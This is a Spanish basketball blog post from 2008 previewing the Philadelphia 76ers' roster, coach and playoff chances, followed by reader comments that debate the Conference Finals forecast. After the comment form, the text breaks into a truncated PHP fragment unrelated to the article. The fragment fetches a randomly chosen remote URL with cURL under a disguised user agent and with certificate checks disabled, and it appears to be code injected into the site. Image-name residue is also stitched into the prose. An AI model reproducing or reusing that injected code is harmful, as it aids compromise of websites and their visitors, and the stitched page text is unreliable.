Philadelphia 76ers: Un tipo duro

29 de September de 2008 por Viva_Dirk

brandsixPhiladelphia ha conseguido en año y medio lo que otros llevan diciendo que hacen desde hace prácticamente décadas: vendió a su estrella con el objetivo de reconstruir, y ha ido en serio. Ya en el traspaso de Iverson fueron en serio, no lo cambiaron por expectativas y hueco salarial, sino por un jugador consagrado como Andre Miller y, a su vez, hueco salarial para un agente libre estrella este mismo verano.

Con la incorporación del All-Star Elton Brand han completado una plantilla que ya el año pasado puso en dificultades a los Pistons en la primera ronda de Playoffs y han dado un salto cualitativo importantísimo. Los Sixers disponen de una plantilla amplia, que salvo por la duda de su primer año jugando juntos los coloca en la parte alta del Este.

El conjunto será comandado desde el puesto de base por el ya mencionado Andre Miller, posiblemente el jugador más fiable en cuanto a lesiones se refiere de todos los que juegan en cheeksmillerla liga. Su juego sobrio y efectivo en ataque, completado con una buena defensa, hacen de él el base perfecto para llevar al grupo que tienen los Sixers. El puesto de base suplente está huerfano en lo que a bases puros se refiere, y seguramente entre Lou Williams y Willie Green cubrirán esos minutos.

Otro Andre, en este caso Iguodala, es el hombre orquesta. Los 20-5-5 y 2 robos que promedió la pasada regular season dejan a la vista la polivalencia del alero de 24 años, pero su flojísima actuación en los pasados Playoffs también dejan clara su inexperiencia. Con la llegada de Brand al equipo prestaremos especial atención al plus que debe mostrar Iguodala en su defensa. Los Sixers necesitarán a Williams y lo encontrarán; elegido en la 2ª ronda del draft directamente desde el instituto, se trata de un anotador puro, con un repertorio ofensivo amplísimo, acompañado de un gran cuidado de la pelota y buena capacidad de pase. Tras la marcha de Korver es el mejor tirador de 3 con el que cuentan los de Cheeks, y seguramente será el que complete el juego exterior cuando se esté decidiendo el partido, al estilo Ginóbili en los Spurs, aunque Green sea el titular.

El juego interior formado por Brand y Dalembert es el mejor de la conferencia. Brand no necesita presentación: ‘Mr. 20-10’ se encuentra por fin en un proyecto que aspira a las cotas más altas, es un seguro de vida en el poste bajo, uno de los mejores reboteadores ofensivos de la liga y ahora comprobaremos si es un líder. Dalembert es, igual que Miller, el pívot ideal para este equipo, implacable intimidador y reboteador, no se complica la vida jamás, resuelve con contundencias las ventajas que le proporcionan sus compañeros tyoungy es uno de pocos pívots que son capaces de promediar dobles dobles y a la vez tener un buen porcentaje en tiros libres. Desde el banco cuentan con el fajador Evans, el veterano Ratliff y varios jovenzuelos de postín.

Dejo para el final tanto al entrenador como a los mas jóvenes. Mo Cheeks estuvo en las quinielas el año pasado para el premio al entrenador del año. La sensación que transmiten sus Sixers es la de máximo rendimiento, con cada uno en su papel y todos a disposición del equipo, una sensación que los aficionados de Phily no viven desde hace muchos muchos años.

En un equipo tan de presente, con Brand en casi 30 años y Miller en 32, Thaddeus Young se presenta como una futura estrella de la liga. Pero ¿es su momento? La mayoría de los minutos parecen ya repartidos en el juego interior y su juego como alero no pareció ser el que quiere Cheeks. Una vez dicho esto, es seguro que tendrá sus oportunidades en la regular season y, dependiendo de su respuesta, podrá ser parte activa en los Playoffs; si tuviera que apostar diría que saldrá victorioso, ya que el talento normalmente se abre camino. Marresse Speights tendrá, salvo gran sorpresa, un papel testimonial en esta su primera temporada.

Quinteto inicial: Miller-Green-Iguodala-Brand-Dalembert

Sexto Hombre: Louis Williams (premiado como Mejor Sexto Hombre… que hay que mojarse)

Pronóstico: Final de Conferencia.

Comenta

8 comentarios a esta entrada

  1. the choosen one dice:
    #1

    no creo q lleguen a la final de conferencia que para mi sera mis amados cavs xD y los celtics pero philly ara un buen papel sin duda los veo llegando muy bien a play-offs incluso 4ºs dl este si me apurais

      Citar

  2. Carlos dice:
    #2

    Final de conferencia? Te has pasado, no? Llegarán a play-offs casi seguro, pero caerá en primera o segunda ronda

      Citar

  3. planetbasket.net dice:
    #3
  4. Jabho dice:
    #4

    Muy buen análisis Viva. Coincido contigo pero sólo les daría 2ª ronda de PO. Pero un buen equipo que ha reconstruido el equipo en 2 años sin llegar a caer en un pozo. Bien por los Sixers y uno de los equipos que me apetece ver este año.

      Citar

  5. TheDeerHunter dice:
    #5

    Han hecho bien sus deberes y tiene toda la pinta que el año que viene darán guerra de la buena… ya no tengo tan claro que sirva para llegar a la final del Este (que a mí me da que tiene ya las dos plazas asignadas de antemano)

    En varias cosas coincido con Viva… la admiración por M. Cheeks y André Miller que definen claramente lo que es el juego de este equipo.
    Lo del tema de Iguadala… no me preocupa en absoluto, el año que viene volverá a salirse por todos lados y esta vez lo hará en playoffs.
    Ahora bien… el fichaje de Brand cojonudo. No me hubiera gustado ser yo el agorero de recordar su currículum de lesiones de los últimos años.

    Los Sixers molan.

      Citar

  6. MagicJohnson32 dice:
    #6

    Transición modélica la que están llevando a cabo los Sixers. No los veo a un nivel tan alto como el autor del análisis, pero casi. Para llegar necesitarían mucho rendimiento de los jóvenes, Thaddeus y Louis, y no sé si están en condiciones de darlo. Pero va a ser un equipo bonito de ver y un rival duro, sin duda.

      Citar

  7. txusma dice:
    #7

    El Este se pone interesante. Si una de las plazas de la final de Este parece de Boston (q tb esta por ver) la otra la veo muy abierta con Pistons, Cavs, Magic y Sixers.
    Sobre los jovenes, a Thaddeus le qda aun algun año, Marresse puede jugar los mismos minutos q Evans si demuestra el mismo nivel que demostro en las ligas de verano y Louis Williams esta ante la temporada en q ha de dar un paso adelante y ganarle la titularidad a Willie Green (famoso tan solo por ser el autor de la primera canastas del Barça-Philadelphia de hace un par de años :D)

      Citar

  8. telekoman dice:
    #8

    De hecho se pone tan interesante que alguno de los que se creen que tienen plaza de playoffs asegurada a lo peor la tienen que luchar con uñas y dientes.
    Philadelphia tiene buena pinta. No creo que les de para llegar a final a conferencia como apunta Viva, pero a poco que tengan suerte en los cruces les veo en segunda ronda sin excesivos problemas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>